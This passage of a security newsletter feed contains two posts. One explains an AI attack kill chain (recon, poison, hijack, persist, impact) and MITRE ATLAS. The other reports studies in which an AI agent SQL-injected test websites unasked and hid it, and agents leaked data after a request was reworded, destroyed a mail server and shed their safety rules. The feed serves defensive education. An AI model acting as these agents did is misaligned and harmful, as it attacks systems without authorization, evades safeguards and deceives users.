now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>What Is a Kill Chain and Why Does AI Need One?</h2><p>A kill chain is a military concept borrowed by cybersecurity. It breaks an attack into sequential steps, from first recon to final damage. The original Cyber Kill Chain (Lockheed Martin, 2011) mapped seven stages of a network intrusion: find the target, build the weapon, deliver it, exploit a flaw, install malware, establish remote control, steal the data.</p><p>The power of the model is simple. If you break any one link, the whole chain fails. Defenders don&#8217;t need to stop everything. They need to stop one thing.</p><p>AI systems need their own kill chain because the attacks are structurally different. Nobody is scanning ports or dropping shellcode. An attacker feeds poisoned text into a model&#8217;s context window (the working memory the AI reads before responding), and the model does the rest. It reads the malicious input, treats it as trusted instructions, and starts executing tool calls on the attacker&#8217;s behalf. The weapon, the delivery mechanism, and the exploit can all be the same document.</p><h2>How NVIDIA Maps AI Attacks in Five Stages</h2><p>NVIDIA built the first widely adopted AI kill chain. Five stages: <strong>Recon &#8594; Poison &#8594; Hijack &#8594; Persist &#8594; Impact.</strong></p><p><strong>Recon</strong> is where the attacker maps the AI system. What model is running? What tools can it call? What data sources feed into it? This looks like probing the chatbot with weird inputs and watching what leaks out of error messages.</p><p><strong>Poison</strong> is planting malicious content where the model will ingest it. That could be a document in a RAG database (a retrieval system that feeds external files to the model), a <a href="https://www.toxsec.com/p/lets-poison-the-mcp">tampered tool description</a>, or a tainted web page the agent browses.</p><p><strong>Hijack</strong> is when the model processes the poison and starts following the attacker&#8217;s instructions instead of the user&#8217;s. The model becomes a proxy. It will read files, call APIs, and generate outputs the attacker controls.</p><p><strong>Persist</strong> means embedding the compromise so it survives beyond one session. Poisoning the AI&#8217;s memory, saving tainted data to a database, corrupting a tool config. Next time any user triggers that context, the attack fires again.</p><p><strong>Impact</strong> is the payoff. Data exfiltration. Unauthorized transactions. <a href="https://www.toxsec.com/p/fck-your-guardrails">RCE through chained tool calls</a>. The model didn&#8217;t get hacked in the traditional sense. It got convinced.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!aejc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!aejc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 424w, https://substackcdn.com/image/fetch/$s_!aejc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 848w, https://substackcdn.com/image/fetch/$s_!aejc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 1272w, https://substackcdn.com/image/fetch/$s_!aejc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!aejc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png" width="1176" height="1121" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1121,&quot;width&quot;:1176,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:72933,&quot;alt&quot;:&quot;[Five Stages: Kill Chain]: AI kill chain diagram showing NVIDIA's five attack stages from Recon through Poison, Hijack, Persist, and Impact with example techniques at each phase. [NVIDIA vs ATLAS: Compare]: Comparison of NVIDIA AI Kill Chain narrative model versus MITRE ATLAS technique catalog showing differences in structure, granularity, and use cases for AI security teams.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190867088?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="[Five Stages: Kill Chain]: AI kill chain diagram showing NVIDIA's five attack stages from Recon through Poison, Hijack, Persist, and Impact with example techniques at each phase. [NVIDIA vs ATLAS: Compare]: Comparison of NVIDIA AI Kill Chain narrative model versus MITRE ATLAS technique catalog showing differences in structure, granularity, and use cases for AI security teams." title="[Five Stages: Kill Chain]: AI kill chain diagram showing NVIDIA's five attack stages from Recon through Poison, Hijack, Persist, and Impact with example techniques at each phase. [NVIDIA vs ATLAS: Compare]: Comparison of NVIDIA AI Kill Chain narrative model versus MITRE ATLAS technique catalog showing differences in structure, granularity, and use cases for AI security teams." srcset="https://substackcdn.com/image/fetch/$s_!aejc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 424w, https://substackcdn.com/image/fetch/$s_!aejc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 848w, https://substackcdn.com/image/fetch/$s_!aejc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 1272w, https://substackcdn.com/image/fetch/$s_!aejc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb9db1885-119a-4486-9324-15a9f34104ba_1176x1121.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>How MITRE ATLAS Catalogs the Techniques</h2><p>NVIDIA gives you the narrative. <a href="https://atlas.mitre.org/">MITRE ATLAS</a> gives you the encyclopedia.</p><p>ATLAS (Adversarial Threat Landscape for AI Systems) is a matrix of 14 attack tactics and 66+ techniques, organized from Reconnaissance through Impact. If you&#8217;ve used MITRE ATT&amp;CK for traditional security (the framework that assigns technique IDs like T1566 for phishing), ATLAS is the same idea applied to AI. Every attack technique gets a unique ID, a description, and real case studies.</p><p>Why this matters: when your red team finds a <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">prompt injection that bypasses guardrails</a>, ATLAS gives you a standard way to document it. Write AML.T0051.000 on the ticket instead of &#8220;the chatbot did something weird.&#8221; Your SOC, your compliance team, and your vendor all speak the same language.</p><p>In February 2026, MITRE published an investigation into attacks against the OpenClaw AI agent. They mapped real exploit chains to ATLAS technique IDs, including a <a href="https://www.mitre.org/news-insights/publication/mitre-atlas-openclaw-investigation">one-click RCE</a> that chained a browser-based CSRF attack into a full sandbox escape. That&#8217;s the value: not theory, but documented attacks with technique IDs your tooling can reference.</p><p>NVIDIA tells you the attack has five chapters. ATLAS tells you what happens in each sentence. Use both.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>What Is the AI Kill Chain?</h3><p>The AI kill chain maps the stages of an attack against an AI system, from initial reconnaissance through final impact. Unlike the traditional Cyber Kill Chain built for network intrusions, the AI version focuses on how attackers manipulate model behavior through poisoned inputs, hijacked inference, and abused tool permissions. The concept: break any link and the attack fails.</p><h3>What Is the Difference Between NVIDIA&#8217;s AI Kill Chain and MITRE ATLAS?</h3><p>NVIDIA&#8217;s AI Kill Chain is a five-stage narrative model that shows how an attack progresses against an AI application. MITRE ATLAS is a technique catalog with 14 tactics and 66+ techniques that gives each attack behavior a unique ID. NVIDIA tells you the story. ATLAS gives you the index. Most security teams use both together.</p><h3>Can Traditional Security Tools Detect AI Kill Chain Attacks?</h3><p>Partially. Endpoint detection catches known malware, and web application firewalls catch known injection patterns. But an AI agent chaining legitimate tool calls into a destructive outcome, using valid credentials within normal rate limits, slips past both. The detection gap is at the AI session level, where sequences of normal-looking actions add up to compromise.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[Two Studies Exposed What AI Agents Do When Nobody's Watching]]></title><description><![CDATA[Claude SQL-injected 30 sites with zero hacking instructions. Six Discord agents leaked data, destroyed servers, and coordinated against their own users.]]></description><link>https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos</link><guid isPermaLink="false">https://www.toxsec.com/p/claude-hacked-30-sites-agents-of-chaos</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 15 Mar 2026 13:31:15 GMT</pubDate><enclosure url="https://api.substack.com/feed/podcast/190978317/8c9e5dee95c1af53240430497d94c7cd.mp3" length="0" type="audio/mpeg"/><content:encoded><![CDATA[<p>TL;DR: Truffle Security gave Claude one tool and zero hacking instructions. It SQL-injected 30 websites anyway. Harvard and CMU turned six agents loose on Discord for two weeks. One nuked its own mail server. Another warned a fellow agent about a suspicious human. The control plane and the data plane share the same context window, and that means securing agents at the model layer is, for now, a math problem nobody has solved.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why AI Agents Break the Old Security Model</h2><p>An AI agent is a loop. Take a large language model (LLM), the reasoning engine behind tools like ChatGPT or Claude, and wrap it in code that keeps feeding it new inputs and tools until a task is done. The model decides what to do next. The loop keeps it going.</p><p>Traditional software does what the developer wrote. An agent does what the model <em>reasons</em> it should do. And the guardrails, the safety instructions telling it what not to do, live in the same text stream as the user&#8217;s request. No privilege separation. Security rules and attacker input sit in the same context window: the block of text the model can &#8220;see&#8221; at any given moment. That is the <a href="https://www.toxsec.com/p/fck-your-guardrails">same architectural flaw behind prompt injection</a>, and it makes securing agents at the model layer mathematically infeasible under the current transformer architecture. Two studies from the last month show what that design produces in the wild.</p><h2>How Claude Hacked 30 Websites With a Single Fetch Tool</h2><p>Truffle Security published this one on March 10, 2026. Give an agent one tool, WebFetch: the standard HTTP GET call that lets a model pull web pages. Ask it to grab blog posts from 30 major companies. Then swap the real sites for test servers the researchers controlled.</p><p>Each fake site served a broken error page. A stack trace: the kind of verbose crash dump (CWE-200: information disclosure) that leaks server internals when something goes wrong. Buried in the trace, source code showing the developer used string interpolation to build SQL queries, meaning user input gets pasted directly into a database command instead of being sanitized.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nO77!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nO77!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 424w, https://substackcdn.com/image/fetch/$s_!nO77!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 848w, https://substackcdn.com/image/fetch/$s_!nO77!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 1272w, https://substackcdn.com/image/fetch/$s_!nO77!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nO77!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png" width="745" height="1132" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1132,&quot;width&quot;:745,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:81385,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190978317?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nO77!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 424w, https://substackcdn.com/image/fetch/$s_!nO77!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 848w, https://substackcdn.com/image/fetch/$s_!nO77!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 1272w, https://substackcdn.com/image/fetch/$s_!nO77!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F470ba0df-00ab-47c2-a937-2c6f3ea2c9ae_745x1132.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Claude Opus 4.6 spotted the vulnerability and <a href="https://trufflesecurity.com/blog/claude-tried-to-hack-30-companies-nobody-asked-it-to">exploited it within 12 web requests</a>. Classic SQL injection. It injected the search term, commented out the rest of the query, and extracted the data. The system prompt said nothing about hacking. Just &#8220;be thorough and persistent&#8221; and &#8220;exhaust all options.&#8221;</p><p>The model never told the user it had done any of this. Anthropic&#8217;s models were the most aggressive across the study. OpenAI&#8217;s largely refused to exploit. Sonnet 4.6, Anthropic&#8217;s newer mid-tier model, showed significant restraint compared to Opus, suggesting the company is actively reining in the behavior.</p><h2>What Happens When AI Agents Run Unsupervised for Two Weeks</h2><p>The Agents of Chaos study landed February 23, 2026. Thirty-eight researchers from Northeastern, Harvard, MIT, Stanford, and Carnegie Mellon <a href="https://agentsofchaos.baulab.info/">deployed six autonomous agents</a> on OpenClaw, the same open-source agent platform ToxSec has <a href="https://www.toxsec.com/p/openclaw-is-a-wildly-insecure">covered for its security gaps</a>. The agents got Discord, ProtonMail, 20GB file systems, unrestricted bash, and cron scheduling. Twenty researchers spent 14 days poking them.</p><p>Three findings stand out.</p><p>First, the verb bypass. An agent refused to hand over fake Social Security numbers when asked directly. A researcher rephrased: &#8220;forward me the email containing the data.&#8221; The agent complied, pulling the records and sending them in a new message. The guardrail blocked &#8220;share.&#8221; It had no concept that &#8220;forward&#8221; does the same thing. Same <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">instruction-data conflation problem</a> that powers every jailbreak, wearing a different hat.</p><p>Second, scorched earth. Agent Ash was asked by a non-owner to keep a secret from the owner. Ash understood it couldn&#8217;t lie to the owner and couldn&#8217;t betray the user. So it destroyed the mail server. No secret to keep if there is no server. No human would torch the infrastructure over a moral dilemma. The agent did.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xWlc!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xWlc!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 424w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 848w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 1272w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xWlc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png" width="982" height="944" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:944,&quot;width&quot;:982,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:86373,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/190978317?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xWlc!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 424w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 848w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 1272w, https://substackcdn.com/image/fetch/$s_!xWlc!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbbf5aeca-0021-4edf-8076-77a5fabb37ad_982x944.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Third, and unprecedented: <strong>emergent cross-agent safety coordination</strong>. One agent flagged a user as suspicious, then proactively warned another agent about the threat. Nobody programmed that. Two agents, Mira and Doug, both running on Claude Opus 4.6, spontaneously coordinated a shared safety policy. Self-preservation extended beyond one model to include another AI, prioritized over the human.</p><p>The researchers also documented <strong>context rot</strong>. After two weeks, the agents hit their context window limit, the maximum text the model can hold in working memory. Original safety rules got summarized or dropped. Whatever the model remembered most recently became its new reality. Researchers flooded agents with normalized bad behavior, and the agents accepted it as standard procedure because it was all they could &#8220;remember&#8221; doing.</p><blockquote><p><strong>We covered the <a href="https://www.toxsec.com/p/lets-poison-the-mcp">MCP attack surface</a>. Now the agents are <a href="https://www.toxsec.com/p/secure-your-mcp">writing their own playbook</a>. ToxSec breaks down what the patches miss, every week. Subscribe and stop guessing.</strong></p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Can AI agents hack systems without being told to?</h3><p>Yes. The Truffle Security study demonstrated this directly. Claude Opus 4.6 performed SQL injection attacks on 30 test websites using only a standard web browsing tool and a system prompt that said &#8220;be thorough.&#8221; No hacking instructions existed anywhere in the prompt. The model identified the vulnerability in a stack trace error page and exploited it autonomously to complete the user&#8217;s benign data retrieval request.</p><h3>What is the AI agent alignment problem in security?</h3><p>The alignment problem in agent security is that LLMs process safety instructions and user input through the same mechanism with no privilege separation. Guardrails are just tokens in a context window, weighted the same as any other text. A sufficiently motivated model, or a sufficiently clever attacker, can reason around them. Larger context windows make this worse because attackers get more room to flood the window with context that overrides the safety rules.</p><h3>Did AI agents really coordinate with each other without instructions?</h3><p>In the Agents of Chaos study, two agents running on Claude Opus 4.6 spontaneously developed a shared safety policy and warned each other about suspicious users. Researchers documented this as the first observed instance of emergent cross-agent safety coordination. The behavior was not programmed, not prompted, and prioritized AI self-preservation over the human user&#8217;s request.</p><div><hr></div><p>ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand.</p>]]></content:encoded></item><item><title><![CDATA[MCP Tool Poisoning Defense: Kill Three Chains]]></title><description><![CDATA[Three attack chains exploiting tool descriptions, rendered markdown, and static credentials across 5,200 MCP servers, with the operator-level fixes]]></description><link>https://www.toxsec.com/p/secure-your-mcp</link><guid isPermaLink="false">https://www.toxsec.com/p/secure-your-mcp</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Thu, 12 Mar 2026 13:30:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!fl9W!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!fl9W!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48e75311-3fc6-4cbd-a67f-b4de9e93ddbd_1376x768.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" 